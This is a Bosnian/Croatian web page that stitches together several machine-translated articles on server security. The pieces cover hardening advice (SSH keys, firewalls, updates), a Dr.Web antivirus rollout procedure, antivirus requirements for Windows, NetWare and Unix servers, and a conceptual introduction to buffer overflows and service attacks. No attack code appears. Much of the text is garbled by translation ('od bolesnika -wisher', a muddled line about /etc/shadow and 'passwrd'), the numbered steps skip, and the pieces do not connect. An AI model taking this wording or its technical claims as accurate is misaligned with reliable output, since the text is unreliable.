Kreiranje servera za zaštitu od virusa. Ovi parametri omogućuju vam definiranje računalnih grupa i domena za skeniranje. Problemi s korisničkim zakazivanjem

Nemoguće je zaštititi poslužitelj od vanjskog pristupa jednom zauvijek, jer se svakodnevno otkrivaju nove ranjivosti i pojavljuju se novi načini hakiranja poslužitelja. U ovom ćemo članku govoriti o zaštiti poslužitelja od neovlaštenog pristupa.

Poslužitelji bilo koje kompanije prije ili kasnije mogu postati meta hakiranja ili napada virusa. Tipično, rezultat takvog napada je gubitak podataka, reputacija ili finansijska šteta, pa se prvo treba uzeti u obzir sigurnost servera.

Treba shvatiti da je zaštita od hakiranja servera skup mjera, uključujući i onu koja podrazumijeva stalno praćenje rada servera i rad na poboljšanju zaštite. Nemoguće je jednom zauvijek zaštititi poslužitelj od vanjskog pristupa, jer se svakodnevno otkrivaju nove ranjivosti i pojavljuju se novi načini hakiranja poslužitelja.

U ovom ćemo članku govoriti o zaštiti poslužitelja od neovlaštenog pristupa.

Načini i načini zaštite poslužitelja od neovlaštenog pristupa

Fizička zaštita servera

Fizička zaštita. Poželjno je da se server nalazi u zaštićenom podatkovnom centru, zatvorenim i čuvanim prostorijama, autsajderi ne bi trebali imati pristup serveru.

Postavite SSH provjeru autentičnosti

Prilikom konfiguriranja pristupa poslužitelju koristite provjeru autentičnosti SSH ključa umjesto lozinke, jer su takvi ključevi mnogo teži, a ponekad ih je jednostavno nemoguće razbiti pomoću nabrajanja opcija.

Ako mislite da vam je lozinka i dalje potrebna, ograničite broj pokušaja da je unesete.

Imajte na umu ako vidite takvu poruku prilikom prijave:

Posljednja neuspjela prijava: Uto Ruj 28 12:42:35 MSK 2017 od 52.15.194.10 na ssh: notty
Od tada je bilo 8243 neuspjelih pokušaja prijave zadnji uspešno prijavljivanje.

To može značiti da je neko pokušao hakirati vaš server. U ovom slučaju, da biste konfigurirali sigurnost poslužitelja, promijenite SSH port, ograničite popis IP adresa s kojih je pristup poslužitelju moguć ili instalirajte softver koji automatski blokira pretjerano česte i sumnjive aktivnosti.

Redovno instalirajte najnovija ažuriranja

Da biste osigurali zaštitu servera, na vrijeme instalirajte najnovije zakrpe i ažuriranja serverskog softvera koji koristite - operativni sistem, hipervizor, server baze podataka.

Preporučljivo je svaki dan provjeravati ima li novih zakrpa, ažuriranja i prijavljenih grešaka / ranjivosti kako biste spriječili napade koji iskorištavaju ranjivosti nula dana. Da biste to učinili, pretplatite se na vijesti kompanije za razvoj softvera, pratite njene stranice na društvenim mrežama.

Zaštitite lozinke

Do sada je jedan od najčešćih načina za pristup serveru razbijanje lozinke servera. Stoga se pridržavajte dobro poznatih, ali ipak relevantnih preporuka, kako ne biste ostavili poslužitelj nezaštićenim:

  • ne koristite lozinke koje je lako pogoditi, kao što je naziv kompanije;
  • ako još uvijek koristite zadanu lozinku za administratorsku konzolu, promijenite je odmah;
  • lozinke za različite usluge moraju biti različite;
  • ako trebate nekome prenijeti lozinku, nikada ne šaljite IP adresu, korisničko ime i lozinku istim slovom ili porukom u messengeru;
  • Možete postaviti potvrdu u 2 koraka za prijavu na administratorski račun.

Firewall

  • Uvjerite se da je server tamo, konfiguriran i da radi sve vrijeme.
  • Zaštitite i ulazni i odlazni promet.
  • Pratite koji su portovi otvoreni i u koje svrhe, nemojte otvarati ništa nepotrebno kako biste smanjili broj mogućih ranjivosti za hakiranje poslužitelja.

Konkretno, vatrozid je od velike pomoći u zaštiti poslužitelja od ddos ​​napada možete brzo stvoriti zabranjena pravila zaštitnog zida i unijeti u njih IP adrese s kojih napad ide, ili blokirati pristup određenim aplikacijama pomoću određenih protokola.

Monitoring i otkrivanje upada

  • Ograničite softver i usluge koji se izvode na vašem serveru. Povremeno provjeravajte sve što radite, a ako pronađete nepoznate procese, odmah ih izbrišite i počnite provjeravati da li ima virusa.
  • Povremeno provjeravajte ima li znakova neovlaštenog rada. Novi korisnički računi koje niste kreirali, premjestili ili izbrisali datoteku mogu ukazivati ​​na kršenje /etc/syslog.conf, izbrisane datoteke / etc / shadow i / etc / passwrd.
  • Pratite performanse vašeg servera, pratite njegovu normalnu brzinu i propusnost, tako da možete primijetiti odstupanja, na primjer, kada je opterećenje servera postalo znatno veće nego inače.

Korištenje VPN -a i SSL / TLS šifriranja

Ako je potreban daljinski pristup poslužitelju, to se mora dopustiti samo s određenih IP adresa i mora se obaviti putem VPN -a.

Sljedeći korak u osiguravanju sigurnosti može biti postavljanje SSL -a, koji ne samo da će šifrirati podatke, već će i provjeriti identitet drugih sudionika u mrežnoj infrastrukturi izdavanjem odgovarajućih certifikata za njih.

Sigurnosna provera servera

Bilo bi dobro da samostalno provjerite sigurnost servera metodom pentest, tj. simulacija napada kako bi se pronašle potencijalne ranjivosti i na vrijeme ih uklonili. U to je poželjno uključiti stručnjake za informacijsku sigurnost, međutim, neki se testovi mogu obaviti neovisno, pomoću programa za hakiranje servera.

Šta još prijeti serverima osim hakiranja

Poslužitelj može otkazati iz više razloga osim hakiranja. Na primjer, to može biti infekcija zlonamjernim softverom ili samo fizički kvar bilo koje komponente.

Stoga bi mjere zaštite servera trebale uključivati:

  • Instalacija i ažuriranje programa za zaštitu servera - antivirus.
  • Redovne šifrirane kopije podataka, barem jednom sedmično, jer su, prema statistikama, tvrdi diskovi servera na prvom mjestu po broju grešaka. Uvjerite se da je sigurnosna kopija pohranjena u fizički sigurnom okruženju.
  • Omogućavanje neprekidnog napajanja serverske sobe.
  • Pravovremena fizička profilaksa poslužitelja, uključujući njihovo čišćenje od prašine i zamjenu termalne paste.

Iskustvo stručnjaka Integrusa nam to govori najbolja zaštita protiv takvih prijetnji je primjena najboljih praksi u oblasti sistema zaštite servera.

Kako bismo osigurali sigurnost poslužitelja naših kupaca, koristimo kombinaciju alata: vatrozidovi, antivirusi, tehnologije za sigurnost / upravljanje događajima (SIM / SEM), tehnologije za otkrivanje / zaštitu od upada (IDS / IPS), tehnologije za analizu ponašanja mreže (NBA) naravno, redovno preventivno održavanje, serveri i uređenje sigurnih serverskih soba po sistemu ključ u ruke. Ovo vam omogućuje da minimizirate rizik od hakiranja ili kvara servera iz drugih razloga.

Spremni smo izvršiti reviziju sigurnosti servera vaše kompanije, posavjetovati se sa stručnjacima, obaviti sve vrste poslova na postavljanju zaštite serverske opreme.

VYACHESLAV MEDVEDEV, Vodeći analitičar, odjel za razvoj, doktor Web

Postupak implementacije zaštite od virusa

Vrlo često, u vrijeme odabira (a ponekad čak i u vrijeme kupovine), kupce zanimaju preporuke o tome kako primijeniti antivirusnu zaštitu ili koraci za zamjenu prethodno korištenog proizvoda. U ovom članku će se raspravljati o tome kako pravilno organizirati proces

Ekstremno važna tačka... Nažalost, u većini slučajeva prodajni kontakti idu s menadžerima, a testiranje se prosljeđuje administratorima sistema. Rezultat je često izvještaj koji zapanji čak i prodavača. Netačni nazivi proizvoda, drevne verzije, naznake nedostatka funkcionalnosti koji su zapravo dostupni već nekoliko godina itd. Sve je potrebno obnoviti, ali voz je već krenuo, a korporativna čast ih sprječava da priznaju da njihovi stručnjaci nemaju potrebne kvalifikacije.

1) Proučavanje mogućnosti rješenja tokom probnih instalacija sistema zaštite za radne stanice, servere datoteka, servere pošte i servere za zaštitu od virusa. I ovdje postoji nekoliko zamki. Čudno, ali vrlo često kupci ne znaju što im treba. I bilo bi u redu da se pitanje odnosi na funkcionalnost, to bi bilo razumljivo. Često čak i pitanje liste softvera koji se koristi u organizaciji uzrokuje poteškoće, što pak ne dopušta formuliranje prijedloga na listi isporučenog softvera.

Drugi problem povezan je s činjenicom da su administratori sistema (koji u pravilu provode testiranje) dobro svjesni korištenih proizvoda, ali (naravno) ne znaju prednosti i nedostatke proizvoda koji se testira (ali na u isto vrijeme očekuju da će biti zamki u slučaju kupnje proizvoda) ... U skladu s tim, preporučuje se da se s potencijalnim dobavljačem dogovorite o popisu procedura koje će se primijeniti pomoću kupljenog proizvoda i zatražiti upute korak po korak za ovu funkcionalnost ili, u nedostatku takvih uputstava, upute za testiranje. To će vam pomoći da izbjegnete gubljenje vremena na proučavanje neočiglednih pitanja.

2) Provera rada bezbednosnih politika formiranih u skladu sa politikom informacione bezbednosti kompanije. Zbog činjenice da svaki proizvod na svoj način implementira funkcionalnost koja je potrebna kompaniji (na primjer, dopušta ili ne dopušta upotrebu proizvoljnog preglednika za kontrolu), i popis koraka postupka i njegovo trajanje mogu razlikuju se. U normalnim vremenima to nije kritično, ali u slučaju virusnog incidenta svaka sekunda može biti dragocjena.

3) Provjera kompatibilnosti softvera Dr.Web i softvera koji se koristi u kompaniji. Softverska nekompatibilnost je rijetka, ali se ta mogućnost ne može zanemariti. Stoga je ovaj korak također potreban tokom testiranja predloženog proizvoda.

4) Pojašnjenje plana implementacije Dr.Web softvera na osnovu rezultata probnih instalacija u skladu sa strukturom korporativne mreže kompanije i rasporedom rada zaposlenih.

a) Pojašnjenje vremena implementacije softverskih komponenti Dr.Web u uslovima lokalne mreže kompanije.Često se tokom procesa nabavke postavlja pitanje o vremenu koje je potrebno za implementaciju. Praksa pokazuje da u velikoj većini slučajeva trajanje raspoređivanja ovisi isključivo o stručnjacima kompanije. Prema istoj praksi, dovoljno slobodnih dana dovoljno je za potpuni prelazak preduzeća iz jednog sistema zaštite u drugi sa brojem stanica koje se približavaju hiljadama.

b) Odabir vrste implementacije softvera Dr.Web na lokalnim stanicama i datotečnim serverima (AD politike, lokalno pokretanje distribucija, skeniranje mreže na nezaštićene stanice itd.). Kompanija može birati između različitih opcija implementacije ovisno o propusnosti mreže, dostupnosti aktivnog imenika i sigurnosnim zahtjevima podružnica i radnika na daljinu (vidi sliku 1).

c) Izbor redosleda i vremena primene softvera u skladu sa strukturom korporativne mreže kompanije i rasporedom zaposlenih. Imperativ je osigurati kontinuitet poslovanja tokom implementacije sigurnosti. Prema zakonu podlosti, u trenutku nedostatka zaštite mogu se dogoditi najstrašnije infekcije.

Primjer sheme postavljanja antivirusne instalacije u poslovnu mrežu prikazan je na Sl. 2.

5) Osposobljavanje administratora sigurnosti kompanije za tehnike rada sa softverom.

6) Razvoj procedura koje se odnose na uklanjanje korištenog antivirusnog softvera i instalaciju softvera.

Čudno, uklanjanje korištenog antivirusa izaziva mnogo pitanja. Korisnici zahtijevaju instalirani antivirus kako bi uklonili prethodno korišteni antivirus. Nažalost, u većini slučajeva to nije moguće. Sustav samoodbrane antivirusa, dizajniran za suzbijanje cyber kriminalaca, sprječava bilo koga da ga ukloni.

a) Razvoj zaštitnih mjera za period kada antivirusni softver nije dostupan na mrežnim elementima kompanije. Alternativno, za ovaj period možete postaviti skeniranje cijelog dolaznog prometa na gatewayu i zabraniti upotrebu prijenosnih medija.

7) Provjera lokalne mreže (zaštićene stanice i serveri) radi dostupnosti usluga neophodnih za postavljanje softvera u mrežu kompanije. Ako je potrebno, prilagodite pravila zaštitnog zida koja se koriste u mreži kompanije. Ova tačka je takođe teška. Čudno, ali nijedan proizvod se ne može kondenzirati iz zraka na zaštićenom računaru. Ovisno o odabranoj vrsti implementacije, morate otvoriti određene portove, omogućiti potrebne usluge itd.

Ponekad su ograničenja portova i usluga koje kompanija koristi kao osnova za odabir vrste implementacije.

8) Odobrenje rasporeda raspoređivanja u mreži kompanije. Donošenje rasporeda zaposlenima u kompaniji u smislu njihove brige. Zaposleni u kompaniji moraju znati (što se njih tiče) o događajima koji se održavaju u kompaniji. U okviru provedenih aktivnosti, stručnjaci kompanije moraju biti u mogućnosti brzo pristupiti potrebnim računarima i prostorijama. Često to nije moguće bez odobrenja nadležnog menadžera.

Zamjena antivirusnog softvera u mreži kompanije

1) Priprema potrebnog softvera ovisno o odabranoj vrsti implementacije. Sasvim je očito da za različite operativne sisteme, vrste aplikacija itd. koriste se različite distribucije.

  • Instalacija servera hijerarhijske mreže, čvorova klastera i, ako je potrebno, potrebne baze podataka (vidi sliku 3).

  • Implementacija redundantnog sistema za Dr.Web servere (vidi sliku 4). Svaki server se može srušiti. No, pad antivirusnog servera dovodi do prestanka ažuriranja zaštićenih stanica. Stoga je sigurnosna kopija antivirusnih poslužitelja ključna.

  • Konfiguriranje grupa i politika.
  • Ako je potrebno, dodijelite pojedinačne administratore korisničkoj grupi i ograničite prava ovih administratora u skladu s politikom kompanije.
  • Izvođenje potrebnih radnji ovisno o odabranoj politici postavljanja. Na primjer, postavljanje AD -a.

2) Skeniranje mreže kompanije pomoću mrežnog programa Dr.Web CureNet! zbog prisutnosti dosad nepoznatog zlonamjernog softvera (vidi sliku 5). Nažalost, nema garancije da računar koji namjeravate instalirati nema zlonamjernog softvera. Naravno, moguća je instalacija na zaraženom računaru, ali uvijek postoji mogućnost da pokrenuti zlonamjerni program ima funkcionalnost usmjerenu na suprotstavljanje instalaciji antivirusa. U najmanju ruku, ovo će izbaciti proces implementacije zaštite iz rasporeda, pa je bolje provjeriti prisutnost zlonamjernog softvera neposredno prije instalacije.

  • Instalacija zaštitnog sistema za radne stanice i poslužitelje datoteka u skladu s postavkama napravljenim u prethodnom koraku.
  • Instalacija zaštitnog sistema za servere pošte, Internet pristupnike.

5) Rad softvera tokom perioda testiranja.

6) Izvođenje ažuriranja softvera u skladu sa politikom kompanije.

7) Sprovođenje periodičnih provjera zaštićenih radnih stanica, datoteka i mail servera (vidi sliku 7).

8) Kontrola radnji softvera protiv uticaja testiranja zlonamjernog softvera.

9) Provjera procedure za interakciju sa tehničkom podrškom.

Općenito, ništa komplicirano ako se unaprijed pripremite za bilo koju fazu.

Sretno s raspoređivanjem!


U kontaktu sa

Na temelju gore navedenih obrazloženja i primjera, možemo formulirati osnovne zahtjeve za antivirus za radne stanice. Jasno je da će se ovi zahtjevi razlikovati za radne stanice različitih klasa.

Antivirusni zahtjevi za Windows radne stanice

Kao i do sada, zahtjevi će biti podijeljeni u nekoliko kategorija:

  1. Opšti zahtjevi- pouzdanost, performanse, jednostavnost upotrebe, jeftinost - nema smisla ponavljati se još jednom
  2. Primarni zahtjevi- kao posljedica glavnog zadatka:
    • Skeniranje svih datoteka na lokalnim diskovima kojima se pristupa - za čitanje, pisanje, pokretanje - radi identifikacije i neutraliziranja računarskih virusa
    • Provjera prijenosnih i mrežnih pogona
    • Provjera memorije
    • Provjeravajući ulazna i odlazna pisma na viruse, treba provjeriti i same poruke i njihove privitke
    • Provjera skripti i drugih aktivnih elemenata web stranica
    • Provjeravanje makronaredbi u dokumentima Microsoft Office i datotekama drugih aplikacija
    • Skeniranje složenih datoteka - arhive, samoraspakirajuće arhive, upakovane izvršne datoteke, baze podataka pošte, datoteke formata pošte, OLE kontejneri
    • Mogućnost odabira različitih radnji na zaraženim datotekama, obično:
      • blokiranje (prilikom provjere u stvarnom vremenu)
      • evidentiranje (skeniranje na zahtjev)
      • brisanje
      • karantin
      • liječenje
      • traženje radnje od korisnika
    • Liječenje zaraženih datoteka
    • Čišćenje zaraženih datoteka u arhivama
    • Poželjno - otkrivanje potencijalno neželjenih programa (moduli oglasnog i špijunskog softvera, hakerski alati itd.)
  3. Uvjeti upravljanja
    • Lokalni GUI
    • Mogućnost daljinskog i centraliziranog upravljanja (korporativna verzija)
    • Mogućnost zakazivanja pokretanja zadataka skeniranja i ažuriranja
    • Sposobnost pokretanja bilo kojeg zadatka ili izvođenja bilo koje radnje na zahtjev (ručno)
    • Mogućnost ograničavanja radnji neprivilegiranog korisnika u odnosu na antivirusni kompleks
  4. Zahtevi za nadogradnju
    • Standardna podrška za različite izvore ažuriranja:
      • HTTP ili FTP resurs
      • Lokalna ili mrežna mapa
      • Centralizirani sistem ažuriranja (u korporativnim verzijama)
    • Mogućnost ažuriranja antivirusnih baza podataka, antivirusnog stroja i aplikacijskih modula
    • Mogućnost ručnog ažuriranja na zahtjev ili automatski prema rasporedu
    • Mogućnost vraćanja ažuriranja antivirusnih baza podataka
  5. Dijagnostički zahtjevi
    • Obavještavanje lokalnog korisnika o važnim događajima - otkrivanju virusa, promjeni stanja antivirusa itd.
    • Vođenje evidencije antivirusa i / ili pojedinačnih zadataka
    • Obavijest administratora o zaštiti od virusa (u korporativnoj verziji)
Antivirusni zahtjevi za Linux / Unix radne stanice
  1. Opšti zahtjevi- praktično nepromijenjeno: pouzdanost, performanse, niska cijena. Upotrebljivost u Unix sistemima tradicionalno se ocjenjuje prema nešto drugačijim kriterijima nego u Windows sistemima, iako se ovo stanje počinje postupno mijenjati prema unifikaciji zahtjeva
  2. Primarni zahtjevi- na osnovu svrhe:
    • Skeniranje proizvoljnih datoteka i direktorija na zahtjev za viruse
    • Poželjno je, ali nije kritično, skenirati određene direktorije u stvarnom vremenu prilikom pristupa datotekama. Ako je takva funkcionalnost zaista potrebna, onda ne govorimo toliko o radnoj stanici koliko o poslužitelju - u Unix sistemima nema očigledne razlike među njima.
    • Otkrivanje virusa u složenim objektima - arhive, samoraspakirajuće arhive, zapakirani izvršni moduli, baze podataka posta, datoteke formata pošte, OLE spremnici - nisu ograničeni na formate uobičajene u Unix okruženju
    • Mogućnost odabira radnje nakon otkrivanja zaraženih datoteka, obično:
      • izbrisati
      • premjestiti ili preimenovati
      • liječiti
      • upišite informacije u izvještaj
      • zatražiti od korisnika akciju (prilikom provjere na zahtjev)
    • Liječenje zaraženih datoteka
    • Poželjno - mogućnost liječenja u arhivi
  3. Uvjeti upravljanja
    • Lokalno upravljanje uređivanjem konfiguracijskih datoteka
    • Poželjno - daljinsko upravljanje putem web sučelja
    • Sposobnost zakazivanja pokretanja zadataka i izvršavanja radnji
    • Sposobnost ručnog obavljanja zadataka i radnji
  4. Dijagnostički zahtjevi
    • Vođenje dnevnika rada
    • Obaveštenje administratora o zaštiti od virusa

Zaštita servera

Generalno antivirusna zaštita poslužitelji se ne razlikuju toliko od zaštite radnih stanica koliko se razlikuju od zaštite gatewaya, na primjer. Glavne prijetnje i tehnologije za njihovo suzbijanje ostaju iste - samo se akcenti pomjeraju.

Mrežni serveri, poput radnih stanica, prirodno su podijeljeni u klase, prema operativnim sistemima koji se koriste:

  • Windows serveri
  • Novell Netware serveri
  • Unix serveri

Princip podjele nastaje zbog prijetnji virusa karakterističnih za različite operativne sisteme i, posljedično, različitih opcija u definiranju glavnog zadatka antivirusa.

U slučaju proizvoda za zaštitu servera, nema podjele na lične i mrežne proizvode - svi proizvodi su mrežni (korporativni). Mnogi proizvođači uopće nemaju podjelu korporativnih proizvoda za radne stanice i poslužitelje datoteka - imaju jedan proizvod.

Posebne prijetnje i protumjere

Sve pretnje specifične za server nisu povezane toliko sa karakteristikama serverskih operativnih sistema koliko sa upotrebom ranjivog softvera tipičnog za servere.

Microsoft Windows serveri

Za Windows servere, sve iste prijetnje su relevantne kao i za radne stanice pod operativnim sistemom Windows NT / 2000 / XP. Jedine razlike su u prevladavajućem načinu rada poslužitelja, što rezultira brojnim dodatnim napadima koji nisu tipični za radne stanice.

Dakle, korisnici rijetko rade direktno iza Windows servera, što znači da se klijenti pošte i kancelarijske aplikacije na serverima obično ne koriste. Zbog toga su zahtjevi za zaštitu pošte na razini klijenta pošte i dodatni načini otkrivanja makro virusa manje traženi u slučaju Windows servera.

Primjer... Za razliku od Kaspersky Anti-Virus-a za Windows radne stanice, Kaspersky Anti-Virus-u za Windows File Servers nedostaje modul za analizu ponašanja makroa koji se izvršavaju pri radu sa dokumentima Microsoft Office i modul za skeniranje dolazne i odlazne pošte. To ne znači da proizvodu nedostaje zaštita od makro virusa i e -mail crva - kao što je već napomenuto, na kraju sve otvorene datoteke provjerava modul za zaštitu datoteka u stvarnom vremenu - samo specifičnosti rada poslužitelja ne zahtijevaju dodatnu zaštitu, kao što je to bio slučaj sa stanicama radnika.

S druge strane, usluge kao što su Microsoft SQL Server i Microsoft IIS mogu se koristiti na Windows serverima mnogo češće nego na radnim stanicama. Kao i sami operativni sistemi koje je napravio Microsoft (i ne samo Microsoft), ove usluge mogu sadržati ranjivosti koje su autori virusa u svoje vrijeme koristili mnogo puta.

Primjer... 2003. godine pojavio se crv Net-Worm .Win32.Slammer koji je doslovno prešao Internetom, što je iskoristilo ranjivost u Microsoft SQL Serveru 2000. Slammer nije spremio svoje datoteke na disk, već se izvršio izravno u adresnom prostoru SQL Servera aplikacija. Crv je zatim napao nasumične IP adrese na mreži u beskrajnoj petlji, pokušavajući iskoristiti istu ranjivost za infiltraciju. Kao rezultat aktivnosti crva, poslužitelji i internetski komunikacijski kanali bili su toliko preopterećeni da su čitavi segmenti mreže bili nedostupni. Južna Koreja je posebno pogođena epidemijom. Treba napomenuti da crv nije izvršio nikakve druge radnje, osim reprodukcije.

Primjer... Ranije, 2001. godine, ranjivost u Microsoft IIS 5.0 je iskorištena za širenje pomoću crva NetWorm .Win32. CodeRed .a. Posljedice epidemije nisu bile tako impresivne kao u slučaju crva Slammer, ali uz pomoć računara zaraženih CodeRed .a, uspješan pokušaj DDoS -a napravljen je na web stranici Bijele kuće SAD -a (www.whitehouse.gov). CodeRed .a takođe nije sačuvao datoteke na diskove zaraženih servera.

Posebnost oba crva je u tome što je modul za provjeru sistema datoteka (barem na zahtjev, barem pri pristupu) nemoćan protiv njih. Ovi crvi ne spremaju svoje kopije na disk i uopće ne pokazuju svoje prisustvo u sistemu, osim zbog povećane mrežne aktivnosti. Do sada je glavna preporuka zaštite pravovremena instalacija zakrpa na operativni sistem i softver koji se koristi. Drugi pristup je konfiguriranje vatrozida tako da su portovi koje koriste ranjive usluge nedostupni izvana - razumni zahtjev u slučaju Slammer zaštite, ali neprihvatljiv za CodeRed zaštitu.

Crvi koji napadaju već izravno ranjive usluge operativnog sistema, poput Lovesan, Sasser, Mytob itd., Ostaju relevantni za Windows servere. Zaštitu od njih treba osigurati opsežnim mjerama - upotrebom vatrozida, instaliranjem zakrpa, korištenjem provjere pristupa (pomenuti crvi u slučaju uspešnog napada čuvaju svoje datoteke na čvrstom disku).

S obzirom na prirodu napada, možemo zaključiti da su glavna sredstva zaštite Windows poslužitelja: modul za skeniranje datoteka pri pristupu, modul za skeniranje datoteka na zahtjev, modul za provjeru skripti, a glavne tehnologije su analiza potpisa i heuristika (kao i ponašanja - u modulu za provjeru skripte) ...

Novell Netware serveri

Ne postoje specifični virusi koji mogu zaraziti Novell Netware. Postoji, međutim, nekoliko trojanaca koji kradu prava pristupa Novell poslužiteljima, ali su i dalje dizajnirani za rad na Windowsima.

U skladu s tim, antivirus za Novell Netware poslužitelj zapravo nije dizajniran za zaštitu ovog poslužitelja. Koje su, dakle, njegove funkcije? U sprječavanju širenja virusa. Većina poslužitelja Novell Netware -a koriste se kao poslužitelji datoteka; Windows korisnici mogu pohraniti svoje datoteke na takve poslužitelje ili pokrenuti programe koji se nalaze na volumenima Novell Netware. Da biste spriječili ulazak virusa u zajedničke resurse servera Novell ili pokretanje / čitanje virusa s takvih resursa, potreban je antivirus.

U skladu s tim, glavni alati koji se koriste u antivirusnom programu za Novell Netware su skeniranje pri pristupu i skeniranje na zahtjev.

Među specifičnim tehnologijama koje se koriste u antivirusima za Novell Netware potrebno je istaknuti blokiranje stanica i / ili korisnika koji pišu zlonamjerne programe na poslužitelj.

Unix serveri

Za Unix servere se može reći isto kao i za Novell Netware servere. Antivirus za Unix servere ne rješava toliko problem zaštite samih poslužitelja od infekcije koliko problem sprječavanja širenja virusa putem poslužitelja. Za to se koriste ista dva osnovna alata:

  • Skeniranje datoteka na zahtjev
  • Provjera pristupa datotekama

Primjer... Kaspersky Anti-Virus za Unix / Linux poslužitelje datoteka sadrži modul za skeniranje pri pristupu, dok Kaspersky Anti-Virus za Linux radne stanice nema takav modul. To je zbog različitih funkcija Linux radnih stanica i poslužitelja - u mreži izgrađenoj isključivo (ili uglavnom) na Linux stanicama, praktički ne postoji rizik od infekcije virusom, pa stoga nema hitne potrebe za modulom koji kontrolira sve operacije datoteka . Naprotiv, ako se Linux računalo aktivno koristi za spremanje i prijenos datoteka (posebno na Windows mreži), onda je to u stvari poslužitelj i zahtijeva stalnu kontrolu datoteka.

Mnogi poznati crvi pod Linuxom koriste za širenje ranjivosti ne u samom operativnom sistemu, već u sistemu i aplikacijskom softveru-na wu-ftpd ftp serveru, na Apache web serveru. Jasno je da se takve aplikacije češće koriste na poslužiteljima nego na radnim stanicama, što je dodatni argument u prilog pojačanim sigurnosnim mjerama servera.

Za razliku od Novell servera, gdje je ugrađena podrška za Microsoft umrežavanje, Unix serveri nisu zadano konfigurirani za prijenos datoteka putem SMB / CIFS-a. U tu svrhu koristi se poseban softverski paket - Samba koji vam omogućuje stvaranje zajedničkih resursa kompatibilnih s Microsoftovim mrežama.

Ako se datoteke razmjenjuju samo pomoću SMB / CIFS protokola, onda očito nema smisla kontrolirati sve operacije s datotekama, dovoljno je provjeriti samo datoteke prenesene pomoću Samba servera.

Primjer... Linija proizvoda kompanije Kaspersky Lab uključuje posebno rješenje - Kaspersky Anti -Virus za Samba Server, dizajnirano posebno za zaštitu zajedničkih mapa stvorenih na Unix poslužiteljima pomoću softvera Samba. Ovaj proizvod ne uključuje modul koji kontrolira rad s datotekama; umjesto toga koristi filtar ugrađen u Sambu koji presreće sve prenesene datoteke.


U ovom članku želim sakupiti neke vrste napada na servere i načine zaštite poslužitelja od hakera. Napisane su brojne knjige i članci na temu sigurnosti. Fokus ovog članka je na osnovnim greškama administratora i rješenjima za njihovo uklanjanje. Nakon čitanja ovog članka i provjere vlastitog servera, administrator također neće moći dobro spavati, može samo reći da sam prošao "minimum kandidata".

Zapamtite tri poslovice administratora,
Ne! bolje ih odštampajte i objesite na svom radnom mjestu pred očima:
"Sigurnost je proces",
"Kad administrator nema šta raditi, bavi se sigurnošću",
"Sigurnost je definirana najslabijom karikom"
Članak je fokusiran na administratore * nix + Apache + PHP + Perl + (MySQL | PostgreSQL) i zaštitu servera od udaljenih napada, za ostale administratore, nadam se, članak će biti hrana za razmišljanje.
U različitim knjigama postoje različite klasifikacije hakerskih napada, predstavit ću svoju podjelu na dvije uvjetne klase SVIH napada, razgrupirati ih:

  • Napadne usluge koje su ranjive i dostupne putem interneta

Da biste razumjeli moju podjelu, zamislite da postoji izmišljena skripta koja daljinski napada Apache na portu 80, a kao rezultat napada Apache prekida rad i ostajete bez svoje web stranice, budući da nema nikoga tko bi dao web stranice. Vaš mailmail sendmail poslan je 1000 znakova kao parametar za VRFY, a ne kratko korisničko ime, sendmail nije očekivao ovakav razvoj događaja i zatvorio vas, ostavljajući vas bez pošte. Općenito značenje napada ove uvjetne klase je da se koristi neka ranjivost aplikacije. A postoje tri načina -

  • put 1) aplikacija će se srušiti i usluga neće biti dostupna, situacija DoS;
  • put 2) aplikacija će početi sa preuzimanjem resursa i, nakon što ih iscrpi, uradiće DoS;
  • putanja 3) aplikaciji će biti dostavljen shellcode i izvršiće se kod napadača;

Sve su to napadi na uslugu (p.1) i tretiraju se na samo jedan način: administrator brzo saznaje od programera o prisutnosti ranjivosti i ažurira ovaj program.

Napad točke 2 je kada dinamička usluga implementirana u nekom programskom jeziku dozvoljava primanje parametara i, bez provjere, izvršava ih. Na primjer, koristeći preglednik, napadač, koji puzi po web lokaciji koju vodi Apache, traži ranjivosti na samoj web stranici i iskorištava ih da dobije ono što želi. Napisano u Tcl -u, bot za moderiranje kanala IRC servera prihvaća zahtjeve korisnika (broj nove anegdote, datum dana za prikaz vremena) i hakera, ponovno stvarajući rad programskog koda robota (obrnuti inženjering ), konstruira zahtjeve koje autor bot nije uzeo u obzir.

Pitajte kako je? onda vam ovaj članak definitivno treba. Na ovaj ili onaj način, malo ispod će sve biti opisano.

Napad na ranjive usluge i sam server

Ovaj odjeljak uključuje sve napade koji pogađaju sistem i usluge. Često su takvi napadi mogući zbog grešaka u implementaciji programa, poput prelijevanja bafera. Ukratko, izgleda ovako, recimo da u loše napisanom FTP serveru postoji niz (bafer) za korisničko ime za određeni broj znakova (na primjer 10), a takav FTP server prima 100 znakova od bolesnika -wisher, ako takva situacija nije u FTP kodu servera je provjereno, dolazi do prelijevanja bafera.

Dakle, što hakeri rade s lokalnim preljevom bafera? Povratnu adresu možete prepisati zlonamjernim kodom. Ovo daljinski omogućava izvršavanje proizvoljnog koda na ciljnom sistemu, lokalno, ako se program pokrene kao root, dobit će privilegije sistemskog administratora.Kod koji uzrokuje prelijevanje međuspremnika i izvršava radnje za hakera naziva se ljuska kod. nije lak zadatak i zahtijeva znanje asemblera od hakera, što podrazumijeva profesionalnost u ovoj oblasti.

Zaštita od napada na ranjive servise i sam server

  • Update... Potrebno je naučiti kako ažurirati cijeli sistem i stoga biti u mogućnosti
    "izgradite svijet i kernel" za * nix, ažurirajte putem Linux paketnog sistema i moći ćete pritisnuti gumb Ažuriraj u Windows Update za licencirani MS Windows. Za administratore FreeBSD -a morate biti u mogućnosti instalirati softver pomoću portova. To će vam pomoći da plovite s programerima, a ne protiv njih.

    Administratori MS Windows -a moraju se naviknuti i često koristiti format distribucije MSI -a, koji Microsoft jako preporučuje i podržava ažuriranje starog paketa novim. Što god radili na svom poslužitelju, zapitajte se: ako postoji nova verzija ovog programa, kako je lakše ažurirati? Morate stvoriti takvo rješenje koje u potpunosti kontrolirate, da, postoje projekti s vlastitim razvojem ili zakrpama, ali ako vaš razvoj zahtijeva zamrzavanje aplikacija koje su vam potrebne na određenoj verziji i ne možete primijeniti svoje zakrpe na novi sustav - takvo rješenje ne vrijedi!

